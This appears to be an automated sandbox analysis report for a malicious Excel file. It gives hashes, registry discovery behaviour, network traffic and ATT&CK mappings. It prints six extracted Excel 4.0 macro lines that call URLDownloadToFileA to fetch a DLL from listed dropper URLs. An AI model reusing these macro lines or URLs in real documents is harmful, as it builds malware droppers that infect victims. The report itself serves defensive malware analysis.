65a6a5d6988fe0e1ac5a5bf6e145046f4f074ce1f459786aaac6629ec01891b4

Analysis

max time kernel
119s
max time network
122s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
21/11/2024, 00:17 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

65a6a5d6988fe0e1ac5a5bf6e145046f4f074ce1f459786aaac6629ec01891b4.xls
Size

126KB
MD5

fda0b9d321be17519d9edc011dc4b0a8
SHA1

5c37cf50381e7b02f9ddcde6bc04805a71bce0a8
SHA256

65a6a5d6988fe0e1ac5a5bf6e145046f4f074ce1f459786aaac6629ec01891b4
SHA512

2e0d49366722a914c379c78157035c1316f8212e92edaec9df57ec100c47f3e3b3e43eff19e0d6a6a749a090fd34843a0b545144f642bd49fd9cf3850f39861c
SSDEEP

3072:LsKpbdrHYrMue8q7QPX+5xtekEdi8/dgR3Syz+nzQIceCRlCd:QKpbdrHYrMue8q7QPX+5xtFEdi8/dgR8

Score

10^/10

discovery

Malware Config

Extracted

Language

xlm4.0

Source

1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://med.devsrm.com/wp-content/gtOOTHi3zkUbn8U6/", "..\fbd.dll")
2
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://izytalab.com/includes/1mafAX0kOa/", "..\fbd.dll")
3
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://pcsolutionss.com/zSlT4HR92TiOpw5NM/", "..\fbd.dll")
4
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://www.doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/", "..\fbd.dll")
5
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://wpl28.realtyna.com/wp-content/0b0ny5cPM/", "..\fbd.dll")
6
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://www.efcballjoint.com/Template/AxEZPOfAa9/", "..\fbd.dll")

URLs

xlm40.dropper

http://med.devsrm.com/wp-content/gtOOTHi3zkUbn8U6/

xlm40.dropper

http://izytalab.com/includes/1mafAX0kOa/

xlm40.dropper

https://pcsolutionss.com/zSlT4HR92TiOpw5NM/

xlm40.dropper

http://www.doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/

xlm40.dropper

https://wpl28.realtyna.com/wp-content/0b0ny5cPM/

xlm40.dropper

http://www.efcballjoint.com/Template/AxEZPOfAa9/

Signatures

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2344	EXCEL.EXE

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2344	EXCEL.EXE
2344	EXCEL.EXE
2344	EXCEL.EXE

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\65a6a5d6988fe0e1ac5a5bf6e145046f4f074ce1f459786aaac6629ec01891b4.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2344

Network

DNS

med.devsrm.com

EXCEL.EXE

Remote address:

8.8.8.8:53

Request

med.devsrm.com

IN A

Response

med.devsrm.com

IN A

143.95.229.88
GET

http://med.devsrm.com/wp-content/gtOOTHi3zkUbn8U6/

EXCEL.EXE

Remote address:

143.95.229.88:80

Request

GET /wp-content/gtOOTHi3zkUbn8U6/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: med.devsrm.com
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 21 Nov 2024 00:17:51 GMT
Server: Apache
Vary: accept,content-type,Accept-Encoding
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <http://aleksasphotoblog.de/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Content-Encoding: gzip
Keep-Alive: timeout=5, max=75
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
DNS

izytalab.com

EXCEL.EXE

Remote address:

8.8.8.8:53

Request

izytalab.com

IN A

Response
DNS

pcsolutionss.com

EXCEL.EXE

Remote address:

8.8.8.8:53

Request

pcsolutionss.com

IN A

Response

pcsolutionss.com

IN A

204.15.133.228
GET

https://pcsolutionss.com/zSlT4HR92TiOpw5NM/

EXCEL.EXE

Remote address:

204.15.133.228:443

Request

GET /zSlT4HR92TiOpw5NM/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: pcsolutionss.com
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 21 Nov 2024 00:17:56 GMT
Server: Apache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
DNS

www.doctorcasenave.com

EXCEL.EXE

Remote address:

8.8.8.8:53

Request

www.doctorcasenave.com

IN A

Response

www.doctorcasenave.com

IN A

172.67.203.60

www.doctorcasenave.com

IN A

104.21.44.190
GET

http://www.doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/

EXCEL.EXE

Remote address:

172.67.203.60:80

Request

GET /wp-content/O2Z1HMebIXiHYBBS/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: www.doctorcasenave.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Date: Thu, 21 Nov 2024 00:17:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: http://doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NsfV5OA%2B31ffY3vYmF4mudrBZdtTHxkpuuKuunAWaoyrYA5bKxMQBeIqZvkQhPg4TnOI6cBZnunmz6vWsxC0ob%2FK78qqMHxPKlCsq1JLM2bAxJkEVlDmqKnlgAqxLmHxFY8l6jKFk61V"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e5c7fe6c8533695-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=60445&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=349&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
DNS

doctorcasenave.com

EXCEL.EXE

Remote address:

8.8.8.8:53

Request

doctorcasenave.com

IN A

Response

doctorcasenave.com

IN A

172.67.203.60

doctorcasenave.com

IN A

104.21.44.190
GET

http://doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/

EXCEL.EXE

Remote address:

172.67.203.60:80

Request

GET /wp-content/O2Z1HMebIXiHYBBS/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Connection: Keep-Alive
Host: doctorcasenave.com

Response

HTTP/1.1 404 Not Found

Date: Thu, 21 Nov 2024 00:17:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <http://doctorcasenave.com/wp-json/>; rel="https://api.w.org/"
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qsYcPvUrMcWy3gQC5RPxBV2tCmrgb9VSHSmPsuj71jWALudVmkbU%2Bcy1q0%2B%2BJHr7lSwFOvjvtFySgol4wV%2FI%2Fis%2BojrP%2B2Yy7ZfT2Dpiaq3TmB2AyfXYELbT3im19n5wTuvO1yQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e5c7fea2e51ef54-LHR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=60143&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=345&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
DNS

wpl28.realtyna.com

EXCEL.EXE

Remote address:

8.8.8.8:53

Request

wpl28.realtyna.com

IN A

Response

wpl28.realtyna.com

IN A

54.173.39.27
DNS

www.efcballjoint.com

EXCEL.EXE

Remote address:

8.8.8.8:53

Request

www.efcballjoint.com

IN A

Response
DNS

www.microsoft.com

Remote address:

8.8.8.8:53

Request

www.microsoft.com

IN A

Response

www.microsoft.com

IN CNAME

www.microsoft.com-c-3.edgekey.net

www.microsoft.com-c-3.edgekey.net

IN CNAME

www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net

www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net

IN CNAME

e13678.dscb.akamaiedge.net

e13678.dscb.akamaiedge.net

IN A

95.100.245.144
GET

http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

Remote address:

95.100.245.144:80

Request

GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.microsoft.com

Response

HTTP/1.1 200 OK

Content-Length: 1078
Content-Type: application/octet-stream
Content-MD5: PjrtHAukbJio72s77Ag5mA==
Last-Modified: Thu, 31 Oct 2024 23:26:09 GMT
ETag: 0x8DCFA0366D6C4CA
x-ms-request-id: 7ca9c103-d01e-0016-3fee-2ba13d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Thu, 21 Nov 2024 00:18:26 GMT
Connection: keep-alive
TLS_version: UNKNOWN
ms-cv: CASMicrosoftCV3b45ffe8.0
ms-cv-esi: CASMicrosoftCV3b45ffe8.0
X-RTag: RT

143.95.229.88:80

http://med.devsrm.com/wp-content/gtOOTHi3zkUbn8U6/

http

EXCEL.EXE

1.4kB
28.7kB
22
24

HTTP Request

GET http://med.devsrm.com/wp-content/gtOOTHi3zkUbn8U6/

HTTP Response

404
204.15.133.228:443

https://pcsolutionss.com/zSlT4HR92TiOpw5NM/

tls, http

EXCEL.EXE

1.2kB
4.8kB
11
9

HTTP Request

GET https://pcsolutionss.com/zSlT4HR92TiOpw5NM/

HTTP Response

404
172.67.203.60:80

http://www.doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/

http

EXCEL.EXE

625 B
1.1kB
6
4

HTTP Request

GET http://www.doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/

HTTP Response

301
172.67.203.60:80

http://doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/

http

EXCEL.EXE

621 B
4.2kB
6
5

HTTP Request

GET http://doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/

HTTP Response

404
54.173.39.27:443

wpl28.realtyna.com

tls

EXCEL.EXE

399 B
179 B
5
4
54.173.39.27:443

wpl28.realtyna.com

tls

EXCEL.EXE

361 B
219 B
5
5
54.173.39.27:443

wpl28.realtyna.com

tls

EXCEL.EXE

288 B
219 B
5
5
54.173.39.27:443

wpl28.realtyna.com

EXCEL.EXE

190 B
132 B
4
3
95.100.245.144:80

http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

http

393 B
1.7kB
4
4

HTTP Request

GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

HTTP Response

200

8.8.8.8:53

med.devsrm.com

dns

EXCEL.EXE

60 B
76 B
1
1

DNS Request

med.devsrm.com

DNS Response

143.95.229.88
8.8.8.8:53

izytalab.com

dns

EXCEL.EXE

58 B
131 B
1
1

DNS Request

izytalab.com
8.8.8.8:53

pcsolutionss.com

dns

EXCEL.EXE

62 B
78 B
1
1

DNS Request

pcsolutionss.com

DNS Response

204.15.133.228
8.8.8.8:53

www.doctorcasenave.com

dns

EXCEL.EXE

68 B
100 B
1
1

DNS Request

www.doctorcasenave.com

DNS Response

172.67.203.60

104.21.44.190
8.8.8.8:53

doctorcasenave.com

dns

EXCEL.EXE

64 B
96 B
1
1

DNS Request

doctorcasenave.com

DNS Response

172.67.203.60

104.21.44.190
8.8.8.8:53

wpl28.realtyna.com

dns

EXCEL.EXE

64 B
80 B
1
1

DNS Request

wpl28.realtyna.com

DNS Response

54.173.39.27
8.8.8.8:53

www.efcballjoint.com

dns

EXCEL.EXE

66 B
139 B
1
1

DNS Request

www.efcballjoint.com
8.8.8.8:53

www.microsoft.com

dns

63 B
230 B
1
1

DNS Request

www.microsoft.com

DNS Response

95.100.245.144

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabEE77.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarEEA9.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
memory/2344-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2344-1-0x000000007284D000-0x0000000072858000-memory.dmp

Filesize
44KB

Download
memory/2344-52-0x000000007284D000-0x0000000072858000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.